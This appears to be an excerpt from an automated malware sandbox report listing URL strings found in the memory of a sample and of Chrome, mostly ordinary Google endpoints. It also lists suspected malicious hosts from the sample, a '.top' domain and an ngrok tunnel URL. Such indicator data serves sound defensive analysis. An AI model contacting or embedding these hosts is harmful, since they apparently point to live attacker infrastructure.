Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 00000004.00000002.2038029637.000018140001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2041134001.0000181400710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2039956806.0000181400444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2039956806.0000181400444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2039956806.0000181400444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8280
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000004.00000002.2040599115.000018140060C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000004.00000002.2040644455.000018140063C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2038383041.00001814000E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.chrome.com/extensions/external_extensions.html)
Source: chrome.exe, 00000004.00000002.2038068735.000018140005A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: file.exe, 00000000.00000003.1693174364.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17
Source: file.exe, 00000000.00000003.1693174364.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://html4/loose.dtd
Source: chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000004.00000002.2041847282.00001814008CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 00000004.00000002.2042458651.00001814009D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000004.00000002.2042458651.00001814009D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/a
Source: Amcache.hve.13.dr String found in binary or memory: http://upx.sf.net
Source: chrome.exe, 00000004.00000002.2042697650.0000181400A50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000004.00000002.2038217453.000018140008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000004.00000002.2039729467.00001814003B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000004.00000002.2038029637.000018140001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000004.00000002.2040100309.00001814004B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
Source: chrome.exe, 00000004.00000002.2039922272.0000181400424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2042740755.0000181400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2038217453.000018140008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout1
Source: chrome.exe, 00000004.00000002.2040100309.00001814004B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession-
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000004.00000002.2042559516.0000181400A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000004.00000002.2038311397.00001814000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000004.00000002.2038311397.00001814000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000004.00000002.2038311397.00001814000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000004.00000002.2038217453.000018140008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2044313342.0000181400C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: file.exe, 00000000.00000003.1693174364.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: file.exe, 00000000.00000003.1693174364.00000000076A2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2039956806.0000181400444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000004.00000003.2027416578.000018140037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027900315.0000181400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2027874058.000018140037C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000004.00000002.2041167199.0000181400728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040205160.00001814004EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 00000004.00000002.2044313342.0000181400C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000004.00000002.2044313342.0000181400C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: chrome.exe, 00000004.00000002.2044313342.0000181400C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000004.00000002.2044313342.0000181400C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000004.00000002.2044313342.0000181400C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 00000004.00000002.2041847282.00001814008CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000004.00000003.2030046781.0000181400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040599115.000018140060C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000004.00000002.2040599115.000018140060C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000004.00000002.2041505353.00001814007F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2038029637.000018140001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2042697650.0000181400A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2042394055.00001814009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000004.00000003.2028451196.0000181400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2031624572.0000181400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2041812935.00001814008B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2030567163.0000181400338000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2028375406.0000181400CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2030709409.0000181400CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2029434831.0000181400CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2030046781.0000181400CF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000004.00000002.2038413779.00001814000F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.cou
Source: chrome.exe, 00000004.00000002.2052746491.00004D7C0078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2008193375.00004D7C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2008508868.00004D7C0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2052950679.00004D7C0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000004.00000002.2052746491.00004D7C0078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2008193375.00004D7C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2008508868.00004D7C0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2052950679.00004D7C0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000004.00000002.2052746491.00004D7C0078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000004.00000002.2052746491.00004D7C0078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2008819825.00004D7C00684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2008193375.00004D7C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2008508868.00004D7C0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2052950679.00004D7C0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000004.00000002.2038029637.000018140001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000004.00000002.2044470661.0000181400C90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g1
Source: chrome.exe, 00000004.00000003.2004452467.00003EAC002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2004434213.00003EAC002D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2012509643.0000181400450000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2039070484.0000181400290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040534850.00001814005E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040676179.0000181400648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2038029637.000018140001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2038348454.00001814000D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000004.00000002.2043191711.0000181400B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chrome.exe, 00000004.00000002.2041847282.00001814008CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000004.00000002.2041847282.00001814008CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
